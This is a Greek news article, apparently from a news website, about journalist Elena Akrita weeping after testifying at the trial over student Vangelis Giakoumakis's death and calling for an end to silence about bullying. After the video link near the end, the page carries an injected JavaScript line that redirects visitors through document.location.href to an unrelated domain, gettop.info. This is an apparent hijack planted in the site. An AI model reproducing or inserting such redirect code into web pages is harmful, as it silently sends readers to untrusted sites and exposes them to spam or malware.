Τα δάκρυα της Έλενας Ακρίτα για τον Βαγγέλη Γιακουμάκη (BINTEO)

0
3

 

Σε δάκρυα ξέσπασε η Έλενα Ακρίτα μετά την κατάθεση της στην δίκη για τον θάνατο του Βαγγέλη Γιακουμάκη.
Η γνωστή δημοσιογράφος, βρέθηκε στο δικαστήριο όπου διεξήχθη η δίκη για τον θάνατο του σπουδαστή της Γαλακτοκομικής Σχολής και αφού κατέθεσε, μίλησε στους δημοσιογράφους που την περίμεναν έξω από την αίθουσα.

H δημοσιογράφος, εμφανώς συγκινημένη, χαρακτήρισε ως φρικαλέα όσα πράγματα υπέπεσαν τότε στην αντίληψή της.

«Όπως ίσως είναι γνωστό και με βάση αυτά που κατέθεσα στην ΓΑΔΑ, υπέπεσαν κάποια φρικαλέα πράγματα στην αντίληψή μου τότε για την περίπτωση του Βαγγέλη Γιακουμάκη. Με όλη μου την ευαισθησία σαν μητέρα, όφειλα να διασταυρώσω και αργότερα να δημοσιοποιήσω την έρευνά μου αυτή. Η άποψή μου η προσωπική είναι ότι κάποτε πρέπει να σταματήσουν δύο πράγματα στην Ελλάδα…».

Στο σημείο αυτό, η δημοσιογράφος συγκινημένη δεν κατάφερε να συγκρατήσει τα δάκρυά της καθώς τόνισε ότι το παιδί της είναι στην ίδια ηλικία με τον αδικοχαμένο Βαγγέλη Γιακουμάκη ενώ απηύθυνε έκκληση να σταματήσει η σιωπή για το φαινόμενο bullying.

«Το παιδί μου είναι στην ίδια ηλικία με τον Βαγγέλη και αυτό καταλαβαίνετε ότι είναι και δικό μου παιδί κατά κάποιον τρόπο. Πρέπει να δουλέψουμε όλοι γι’ αυτόν τον σχολικό εκφοβισμό, για την κακοποίηση, για τον δυνατόν που χτυπάει τον αδύνατο και για την σιωπή.

Όταν ο Βαγγέλης έλεγε “μου κάνουν πλάκα” το έλεγε γιατί φοβόταν να πει την αλήθεια και βεβαίως το δεύτερο η στάση του όποιου βουλευτή που το μόνο που τον ενδιαφέρει είναι η ρουσφετολογία, το ρουσφέτι μάλλον, ο κομματάρχης του, ο νομός του, ο παλαιοκομματισμός του και φυσικά όλα αυτά με την ρομφαία της ασυλίας.

Πώς ότι και να κάνω εγώ δεν πρόκειται να πάθω τίποτα. Θα απειλώ τους άλλους για την δικαιοσύνη, λες και η δικαιοσύνη είναι μια εκδικητική εξουσία και όχι μια δημοκρατική εξουσία, αλλά εγώ δεν μπορώ να πάθω τίποτα. Κάποια στιγμή όλοι πρέπει να λογοδοτήσουμε, όλοι. Και πρέπει να ανοίξουν τα στόματα, είναι ακόμα κλειστά. Ο καθένας, όμως, κρίνει κατά την συνείδηση και τον δικό του αξιακό κώδικα», είπε η Έλενα Ακρίτα..

https://youtu.be/B3UtPRfo32Q setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here